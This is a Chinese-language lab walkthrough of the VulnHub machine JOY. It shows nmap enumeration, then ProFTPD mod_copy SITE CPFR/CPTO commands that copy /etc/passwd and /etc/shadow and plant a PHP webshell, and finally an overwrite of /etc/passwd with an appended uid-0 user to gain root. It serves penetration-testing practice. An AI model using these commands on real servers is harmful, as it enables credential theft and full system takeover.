vulnhub（13）：Digitalworld.local JOY（ftp 的未授权文件读写漏洞、文件覆盖提权）

端口

nmap主机发现

nmap -sn 192.168.72.0/24
​
Nmap scan report for 192.168.72.171
Host is up (0.00020s latency).
​
171是新出现的机器，他就是靶机

nmap端口扫描

nmap -Pn 192.168.72.171 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps
995/tcp open  pop3s这么多端口：995，993，465，143，587，110，25都是邮箱服务
445，139是samba服务
80，22，21是常见的端口
​
以下我对渗透测试优先级排名：
21，80，22尝试枚举足够多的敏感信息加渗透，然后再查看这三个端口是否有服务漏洞
445，139枚举敏感信息，查看是否有可利用的漏洞
邮件服务端口：是否有敏感信息

立足

21端口

upload页面发现信息：
​
directory文件：
drwxr-xr-x 18 patrick patrick 4096 Sep 23 19:40 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw-------  1 patrick patrick  185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick  220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick 3526 Dec 23  2018 .bashrc
drwx------  7 patrick patrick 4096 Jan 10  2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26  2018 .config
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Desktop
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick 4096 Jan  6  2019 Downloads
drwx------  3 patrick patrick 4096 Dec 26  2018 .gnupg
-rwxrwxrwx  1 patrick patrick    0 Jan  9  2019 haha
-rw-------  1 patrick patrick 8532 Jan 28  2019 .ICEauthority
drwxr-xr-x  3 patrick patrick 4096 Dec 26  2018 .local
drwx------  5 patrick patrick 4096 Dec 28  2018 .mozilla
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Music
drwxr-xr-x  2 patrick patrick 4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick    0 Sep 23 19:40 PebAhabiNhV7N4eiwznehDQzCpydliND.txt
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick  675 Dec 23  2018 .profile
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick   24 Sep 23 19:40 qbcN77aaMZMzCNKOTlq9jBMrIRO5DshbvdJH1emkdC3ZFTAE7GPCBhZSnljTXHor.txt
d---------  2 root    root    4096 Jan  9  2019 script
drwx------  2 patrick patrick 4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 Sun
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick  407 Jan 27  2019 version_control
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Videos
​
​
这是/home/patrick下的所有文件，其中确实有很多敏感内容
​
还有很多以project开头的文件，查看他们所有内容：
cat project*
​
This is a brave project!
colour
airline
skilled footballer!
Perhaps the head of development is secretly a sicko...
either a dog name, or the name of a lottery in singapore
ONE!
wine app
you only live once!
dog
cat
ant
bird
fish
hare
snake
mouse
eagle
rabbit
jaguar
python
penguin
peacock
phoenix
kangaroo
parakeet
mosquito
mousedeer
woodlouse
cockroach
kingfisher
rhinoceros
pondskater
​
一些名词，一般有三种推测：1.密码 2.用户名 3.没用
看后续场景是否能用到

80端口

是个开源的入侵检测系统，searchsploit 没发现0.8版本漏洞
​
交互的地方也比较少，看看url参数f是否有本地文件包含，最终结果当然没有，一般这种系统也不会出现这么低级错误
​
同时robots.txt页面什么敏感内容都没有

22端口

其报了三个错误，但都能使用参数解决
no matching key exchange method found. Their offer: diffie-hellman-group1-sha1
​
no matching host key type found. Their offer: ssh-rsa,ssh-dss
​
no matching cipher found. Their offer: aes128-cbc,blowfish-cbc,twofish-cbc,3des-cbc
​
ssh 192.168.72.171 -oKexAlgorithms=diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss -c aes128-cbc 
​
但是又出现一个错误，明显是作者故意而为之：
Connection reset by 192.168.72.171 port 22
​
22端口连接不了

21端口服务漏洞

按照我们的思路接下来查看21，80，22是否有服务漏洞
​
21端口ProFTPD 是1.2.10版本，我们着重挑选1.2.10的版本后的漏洞，我注意到了
1.3.5版本有个file copy的漏洞：看了poc得知，这了漏洞是未授权的敏感文件读写，那么影响力一定很大
​
果不其然我查到了这篇文章：https://gbhackers.com/proftpd-file-copy-vulnerability/
​
文章标题：ProFTPD 的文件复制漏洞使超过 100 万台服务器面临风险
引用文章里的某些话：
ProFTPD 服务器中的文件复制漏洞允许匿名远程攻击者在易受攻击的机器上执行代码，从而导致无需身份验证的远程代码执行和信息泄露。
利用此漏洞，攻击者可以运行具有 Pro-FTPd 服务权限的任何程序代码。此漏洞的编号为CVE-2019-12815，影响 1.3.5b 及以下所有版本。
​
那我们就能尝试一下此漏洞

nc 192.168.72.171 21    
​
220 The Good Tech Inc. FTP Server
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /home/ftp/passwd
250 Copy successful
site cpfr /etc/shadow
350 File or directory exists, ready for destination name
site cpto /home/ftp/shadow
250 Copy successful
​
敏感文件先copy过来，但是ssh关闭的，我们只能尝试上传一个shell
为了上传webshell，我们直接把/var/www拷贝过来，目的是能够上传到正确的目录
220 The Good Tech Inc. FTP Server
site cpfr /var/www
350 File or directory exists, ready for destination name
site cpto /home/ftp/www
250 Copy successful
​
发现web主目录如下：
/var/www/tryingharderisjoy/ossec
​
我们直接上传php的webshell
先将shell传给ftp
put shell.php
​
然后拷贝shell.php到web目录
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/shell.php
350 File or directory exists, ready for destination name
site cpto /var/www/tryingharderisjoy/shell.php
250 Copy successful
​
点击即可getshell

提权

生成密码

openssl passwd -1 -salt hack hack123
生成一个hack123 md5加密的密码hash，然后盐值为hack再加密一次
​
构造字符串追加到passwd
echo "hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash" >> passwd

上传至ftp并覆盖/etc/passwd

put passwd
​
nc 192.168.72.171
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/passwd
350 File or directory exists, ready for destination name
site cpto /etc/passwd
250 Copy successful

覆盖后

su hack
password:hack123
成为root
​
root@JOY:~# id
id
uid=0(root) gid=0(root) groups=0(root)